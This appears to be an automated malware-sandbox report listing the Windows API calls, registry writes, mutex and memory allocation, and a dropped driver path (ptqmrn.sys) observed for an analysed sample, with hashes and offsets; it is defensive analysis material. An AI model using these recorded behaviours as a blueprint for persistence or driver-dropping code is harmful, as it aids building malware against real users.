                                  • Opcode Fuzzy Hash: 7c4b8463a133e1f0a885a21549b9f04efd0bc303e6cd64a6b8dabc594336f025
                                  • Instruction Fuzzy Hash: 74317EF5D40218ABD710CB54DC94BEAB3BDEB59704F0086D9EA8A57280D6F15AE4CFA0
                                  APIs
                                  • GetUserNameA.ADVAPI32(00000000,?), ref: 022F1C31
                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 022F1CC8
                                  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 022F1CE9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CreateNameOpenUser
                                  • String ID:
                                  • API String ID: 3417583755-0
                                  • Opcode ID: 07f7cfc9d24e95dcf73268aeab1eff6c28aa4802b8949f4786ef75d01a43e92f
                                  • Instruction ID: 2d4b2b7fddd2067424ef5c7a5782cf1134bf966ca61c58a8ca3d17638e626fce
                                  • Opcode Fuzzy Hash: 07f7cfc9d24e95dcf73268aeab1eff6c28aa4802b8949f4786ef75d01a43e92f
                                  • Instruction Fuzzy Hash: 3AE195B1910218DBDB28DF54CC45FEAB779BB0D304F0486E9E74966288D7709BA4CF91
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 022F199A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: e1d83c6ce65de93a5f9b6b23082073ba35f18e470a960f4f3db69ecabe868d53
                                  • Instruction ID: 16ca77beb11c8017c4c6907834a320becdd5fb8785ed9ca32549a0fffe1abe33
                                  • Opcode Fuzzy Hash: e1d83c6ce65de93a5f9b6b23082073ba35f18e470a960f4f3db69ecabe868d53
                                  • Instruction Fuzzy Hash: 29714CB5D14218EBDB28CF94CC45BEAF779BB58300F0085E9E749A6244D7B09AD4CFA0
                                  APIs
                                    • Part of subcall function 02303090: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,022F21E7), ref: 023030C7
                                    • Part of subcall function 02303090: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,022F21E7), ref: 023030EE
                                  • Sleep.KERNEL32(000493E0,00000001), ref: 022F3DD5
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00003A74,00000000,00000000,00000000), ref: 022F3E4B
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 022F3E52
                                  • Sleep.KERNEL32(00000200), ref: 022F3E5D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CreateFileSleep$ChangeCloseFindMappingNotificationThreadView
                                  • String ID:
                                  • API String ID: 249821800-0
                                  • Opcode ID: 3a773a86bd3667a46f5a0ea4051509b5e53a21daaf52dc475bcfa4f125914cb1
                                  • Instruction ID: 665f0edfdb0c03fd34287c80147bfd90f1607e7e9a9096b31da9b82eda3b5a07
                                  • Opcode Fuzzy Hash: 3a773a86bd3667a46f5a0ea4051509b5e53a21daaf52dc475bcfa4f125914cb1
                                  • Instruction Fuzzy Hash: 1C414DF1E50268DBD764DBA0D858B9AB7B8FF04705F4005F8E70AA61D1DBB01A84CF69
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 02301C99
                                  • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 02301CB5
                                  • RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 02301CD3
                                  • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 02301CEF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$CreateOpen
                                  • String ID:
                                  • API String ID: 4052006930-0
                                  • Opcode ID: 0012ccc6e153e60c7f8670b7991a000fca0b0de30280d6be66d933860f14b5fa
                                  • Instruction ID: 1ce18de4a74c1ced6bff2044d2d07cc419cdccce17b640b3238f0afa95040883
                                  • Opcode Fuzzy Hash: 0012ccc6e153e60c7f8670b7991a000fca0b0de30280d6be66d933860f14b5fa
                                  • Instruction Fuzzy Hash: CC11D6B9A40208BBDB04DFA4D999FAB77BDAB4C700F108649FB0997184D670AA14DB60
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 0047C93E
                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0047C9ED
                                  • LoadLibraryA.KERNEL32(?), ref: 0047CB6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AllocCreateLibraryLoadMutexVirtual
                                  • String ID:
                                  • API String ID: 4101883406-0
                                  • Opcode ID: 0c0120f338f289cd012ea18f26d6474d14443b2313145660eafd53ec3f30eb48
                                  • Instruction ID: 7fbc8bb3276ab8402d6d65c577c2096bfae57e5682775a5b144c1dc0b876611b
                                  • Opcode Fuzzy Hash: 0c0120f338f289cd012ea18f26d6474d14443b2313145660eafd53ec3f30eb48
                                  • Instruction Fuzzy Hash: 03C1F375A002898FDB10CF28CD85BD937A5FF54301F19891AEC0DAF2A1D779AA44CB5E
                                  APIs
                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 02300901
                                  • DeleteFileA.KERNEL32(?), ref: 0230092A
                                    • Part of subcall function 022FFA87: Sleep.KERNEL32(?,?), ref: 022FFB01
                                  • Sleep.KERNEL32(00000400), ref: 02300962
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FileSleep$CreateDelete
                                  • String ID:
                                  • API String ID: 3010656087-0
                                  • Opcode ID: 0075f843faf9d5d180bb6059293d40fdf4a03e9bd8502f4faafef09d85c1f8de
                                  • Instruction ID: 2adc94fe0ca3bf7a196bc4fbd3631fa6c4082adc9845cd3fafa010dab315074d
                                  • Opcode Fuzzy Hash: 0075f843faf9d5d180bb6059293d40fdf4a03e9bd8502f4faafef09d85c1f8de
                                  • Instruction Fuzzy Hash: 2831C7B1940B58EBDB10CF98DC59BEBBB78EB44712F1046A4FA09662C0CB755A85CF90
                                  APIs
                                  Strings
                                  • C:\Windows\system32\drivers\ptqmrn.sys, xrefs: 022FB621
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: C:\Windows\system32\drivers\ptqmrn.sys
                                  • API String ID: 3472027048-3231871182
                                  • Opcode ID: bb4d2ca94764aff04006b09f825f815e3fae2864f05f49de393d3290d2c2b710
                                  • Instruction ID: 5c7cb376fc40172cf4ee0f1e25098da6e2d72cc61223234863514ee12b4a6296
                                  • Opcode Fuzzy Hash: bb4d2ca94764aff04006b09f825f815e3fae2864f05f49de393d3290d2c2b710
                                  • Instruction Fuzzy Hash: BA617CF0D90305EFD750EFE4E898F5AB7B8B708325F108B29EA2596288D7745555CF20
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02301561
                                  • FindCloseChangeNotification.KERNEL32(?), ref: 0230158D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ChangeCloseCreateFindMutexNotification
                                  • String ID:
                                  • API String ID: 2967213129-0
                                  • Opcode ID: faef8b0c69ceb4068e653d6520a275bb47c8b4e44dee9499bb43401cf9d22ba7
                                  • Instruction ID: ecc0be95f51521bec3c1ceb490d25d28328156ef54678d46839a7eddd1d127d1
                                  • Opcode Fuzzy Hash: faef8b0c69ceb4068e653d6520a275bb47c8b4e44dee9499bb43401cf9d22ba7
                                  • Instruction Fuzzy Hash: 165151F5D402289BCB24DB60DCD8BDEB77DAB58301F0049D5EB4AA6180DBB49AD5CF60
                                  APIs
                                  • GetPrivateProfileStringA.KERNEL32(?,?,00000000,00000000,00000080,?), ref: 022FBACC
                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 022FBB61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: PrivateProfileString$Write
                                  • String ID:
                                  • API String ID: 2948465352-0
                                  • Opcode ID: aa45dc14d7409149f467012f05dade3c353fa3aaa0ab70bbf24e89b0371f2f54
                                  • Instruction ID: 8ac56bca18447fa0ab2f9d93c6c933ceaf93049c0fa3633a01f0e5fdcf15a3c0
                                  • Opcode Fuzzy Hash: aa45dc14d7409149f467012f05dade3c353fa3aaa0ab70bbf24e89b0371f2f54
                                  • Instruction Fuzzy Hash: 14316DB2E40224BFDB14DB64D858BD6B7BDAB48300F0089E9E60993240DF745BA58F60
                                  APIs
                                  • RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 02300C8F
                                  • RegCloseKey.KERNEL32(?), ref: 02300CFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseEnumValue
                                  • String ID:
                                  • API String ID: 858281747-0
                                  • Opcode ID: 3a4512e8a6d25a42c0c1d5009656214f6f085f3ec1854169364d0d03fbbe6f49
                                  • Instruction ID: 866a3f7f1ebccf9010667cb817458dc346eca398b4d423000ea9fd07bdfa1fee
                                  • Opcode Fuzzy Hash: 3a4512e8a6d25a42c0c1d5009656214f6f085f3ec1854169364d0d03fbbe6f49
                                  • Instruction Fuzzy Hash: 8821AFB1E40218EBDB24CB54CC99BEAB778AB18700F1046D4E749AA1C0D7F05BD8CFA0
                                  APIs
                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,022F21E7), ref: 023030C7
                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,022F21E7), ref: 023030EE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$CreateMappingView
                                  • String ID:
                                  • API String ID: 3452162329-0
                                  • Opcode ID: 7b97c3305b615fbeb739961c0f7610d33a3030961fba4d7da61d9934a10835ab
                                  • Instruction ID: 4d2c6f674d85c9c8ac517522e2d0159f694b0fe63f614dafe7898ba7378d8ac9
                                  • Opcode Fuzzy Hash: 7b97c3305b615fbeb739961c0f7610d33a3030961fba4d7da61d9934a10835ab
                                  • Instruction Fuzzy Hash: A701D6B4A40208EFD710CF84CA45F59B7F5BB08704F248288EA096B3C0C771AE41DB44
                                  APIs
                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,0040E1BE,00000001), ref: 00415181
                                  • HeapDestroy.KERNEL32 ref: 004151B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Heap$CreateDestroy
                                  • String ID:
                                  • API String ID: 3296620671-0
                                  • Opcode ID: 1943bc7c832f535b68011679f5404c46088416c0c84797c873491ef1964ef284
                                  • Instruction ID: 785dcae1abef6bb6a41f40f9a4757498d538dafb9a4812b20194f0846cc82415
                                  • Opcode Fuzzy Hash: 1943bc7c832f535b68011679f5404c46088416c0c84797c873491ef1964ef284
                                  • Instruction Fuzzy Hash: D6E06D31F60B05EADB226F319D093EA37B4F780386F004C3BF004C41A4E77884819A8E
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseFindSleep
                                  • String ID:
                                  • API String ID: 1358061995-0
                                  • Opcode ID: 98f4eb5e9c5cfdd8cd7f81d54a60f014306d5e643757f15f7644c2b5f26269b8
                                  • Instruction ID: 212b85f8c60ced908838a2d3124d3a81dc68f7348cfc60bf5a5621d5da457d60
                                  • Opcode Fuzzy Hash: 98f4eb5e9c5cfdd8cd7f81d54a60f014306d5e643757f15f7644c2b5f26269b8
                                  • Instruction Fuzzy Hash: BFE04FB2E402548BCB20CB94D8097A9B7B4FB08329F0006A9EB1893680D7300450CB55
                                  APIs
                                  • ___crtCorExitProcess.LIBCMT ref: 0040C624
                                    • Part of subcall function 0040C5FA: GetModuleHandleA.KERNEL32(mscoree.dll,0040C629,?,0040FE5D,000000FF,0000001E,00000001,00000000,00000000,?,00411A6B,0040B4E2,00000001,?,004119B7,00000018), ref: 0040C5FF
                                    • Part of subcall function 0040C5FA: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040C60F
                                  • ExitProcess.KERNEL32 ref: 0040C62E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                  • String ID:
                                  • API String ID: 2427264223-0
                                  • Opcode ID: f3722c443879d0d884ce09c41049c90811e2f0771dfda0bd44a2788c3cfeaa22
                                  • Instruction ID: 1026c6b9ad5427ec671a29fc0639f6b256145276ec8f23bf331f9d27c03a5470
                                  • Opcode Fuzzy Hash: f3722c443879d0d884ce09c41049c90811e2f0771dfda0bd44a2788c3cfeaa22
                                  • Instruction Fuzzy Hash: F9B09230004100EADA052B21DD0A40D7B61EB40600B008529F04A14070CB715C50BA0A
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 870f95c24599a8d231a121789ae976cddef83518ee6c7fe0087b6af9439f359b
                                  • Instruction ID: ed3065f60c9960aaa4c01b58ed4aeef8f76c71e1de96c560360e685c8d594a00
                                  • Opcode Fuzzy Hash: 870f95c24599a8d231a121789ae976cddef83518ee6c7fe0087b6af9439f359b
                                  • Instruction Fuzzy Hash: 6381E6B1E102298BEB64DB94CC91BAFB7B9FB44304F0446F9D30966285DBF55A84CF84
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,00015000), ref: 02301648
                                    • Part of subcall function 022FBD79: MapViewOfFile.KERNEL32(00000280,00000006,00000000,00000000,00015400,?,00000000), ref: 022FBDD7
                                  • GlobalFree.KERNELBASE(?), ref: 02301690
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Global$AllocFileFreeView
                                  • String ID:
                                  • API String ID: 3692339905-0
                                  • Opcode ID: e33f0addd75690af41e3e596515aa6fc96faa02b0b5113c7622be7bb47eb673f
                                  • Instruction ID: 0052428cbf8740db35f8f4e77ae324f3e916b010fe0ccf6cc2f225e2f23ad33b
                                  • Opcode Fuzzy Hash: e33f0addd75690af41e3e596515aa6fc96faa02b0b5113c7622be7bb47eb673f
                                  • Instruction Fuzzy Hash: 4331B6B5E40208AFEB14DF98DC95B9E77B8EB48B14F048324E919663C4D7B56500CBB6
                                  APIs
                                  • Sleep.KERNEL32(00001000), ref: 02300D11
                                    • Part of subcall function 02300C04: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 02300C8F
                                    • Part of subcall function 02300C04: RegCloseKey.KERNEL32(?), ref: 02300CFE
                                  • Sleep.KERNEL32(000493E0), ref: 02300D2A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Sleep$CloseEnumValue
                                  • String ID:
                                  • API String ID: 1160872746-0
                                  • Opcode ID: 9674a81693986bfb8f29ca733f3f19ccbd89e6612de116791fda7a7b4757bc3b
                                  • Instruction ID: e22766a99a488c6ebcbf566ca7d82b19adc9c2fd926aad189fd5df583784ece4
                                  • Opcode Fuzzy Hash: 9674a81693986bfb8f29ca733f3f19ccbd89e6612de116791fda7a7b4757bc3b
                                  • Instruction Fuzzy Hash: CDD0A9B06C8214A7E30CA7B2A859B273A6CAB04792F000831FB0AC81C1CBA29420C536
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?), ref: 022F635B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 510d83195ca26ef906f5d75e0654debd87bf73ed28ab3d1e1e4026e8dbf487be
                                  • Instruction ID: c412468e5b8ece6b8c7686c04956bec444d148ed1f9c58ddb65a398bbd254651
                                  • Opcode Fuzzy Hash: 510d83195ca26ef906f5d75e0654debd87bf73ed28ab3d1e1e4026e8dbf487be
                                  • Instruction Fuzzy Hash: B241B5B59502289FCB64CFA4CC88BEBB77DFB19300F104AE5E669D6140C7B58A95CF50
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?), ref: 022F635B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: c36a7b8c5f56135f5ca143e3cbd2f8d988b9ed292697f12c6644816e9aec6eaf
                                  • Instruction ID: cfe61cb9daebaefe41803316c944291eb26efe60cbef2004e5469866b11c253f
                                  • Opcode Fuzzy Hash: c36a7b8c5f56135f5ca143e3cbd2f8d988b9ed292697f12c6644816e9aec6eaf
                                  • Instruction Fuzzy Hash: 2F41B3B59502189BCB64CBA4C888BEAB77DFB15300F104AB4E72AD6184CBB59AC5CF50
                                  APIs
                                  • RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 022F1B06
                                  • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 022F1B35
                                  • RegCloseKey.KERNEL32(?), ref: 022F1B47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$Close
                                  • String ID:
                                  • API String ID: 3391052094-0
                                  • Opcode ID: 4a820b692bf22d3722cab14c27ff5575e3859ed86392806f4b91f673ad4c2cbf
                                  • Instruction ID: f347d6b6c050039729b9ac3c781c7df7c2ffba5a4e4e160bc13109db39c3be95
                                  • Opcode Fuzzy Hash: 4a820b692bf22d3722cab14c27ff5575e3859ed86392806f4b91f673ad4c2cbf
                                  • Instruction Fuzzy Hash: 71313AB4910218EFCB58CF95CC45ADAF775BB48700F4081E9E78E6B248D7309AA1CFA0
                                  APIs
                                  • MapViewOfFile.KERNEL32(00000280,00000006,00000000,00000000,00015400,?,00000000), ref: 022FBDD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FileView
                                  • String ID:
                                  • API String ID: 3314676101-0
                                  • Opcode ID: 549ac51da60840ea855a4b6e2ea414c60683571f7cf9259bc4b2ad05b5efb6a4
                                  • Instruction ID: 3bd10e4cf785d1584aee6a62ea0fd4a42721759d5022d67ecc4dbae85f173f2c
                                  • Opcode Fuzzy Hash: 549ac51da60840ea855a4b6e2ea414c60683571f7cf9259bc4b2ad05b5efb6a4
                                  • Instruction Fuzzy Hash: 63113DB1D80309ABDB10CF98DC49BAAB7B8EB08B28F104629E625673C4D7795551CB94
                                  APIs
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000004), ref: 02303D86
                                  • RegCloseKey.KERNEL32(00000000), ref: 02303E6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID:
                                  • API String ID: 3356406503-0
                                  • Opcode ID: 4e8f81f8747aebcfbec0b7d9fec7df8a0f87c78491f333ef42d956414390507e
                                  • Instruction ID: 058450a56b9b4da83d9d3a68347eee636d07faa347d1a007885a7e0be65f9116
                                  • Opcode Fuzzy Hash: 4e8f81f8747aebcfbec0b7d9fec7df8a0f87c78491f333ef42d956414390507e
                                  • Instruction Fuzzy Hash: A411C6B1D112299BDB24DF44CC9CBAAB7B8BB48704F0446D9E60DA6281D7789BC4CF61
                                  APIs
                                  • RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 02303C94
                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000004), ref: 02303D86
                                  • RegCloseKey.KERNEL32(00000000), ref: 02303E6E
                                  Memory Dump Source
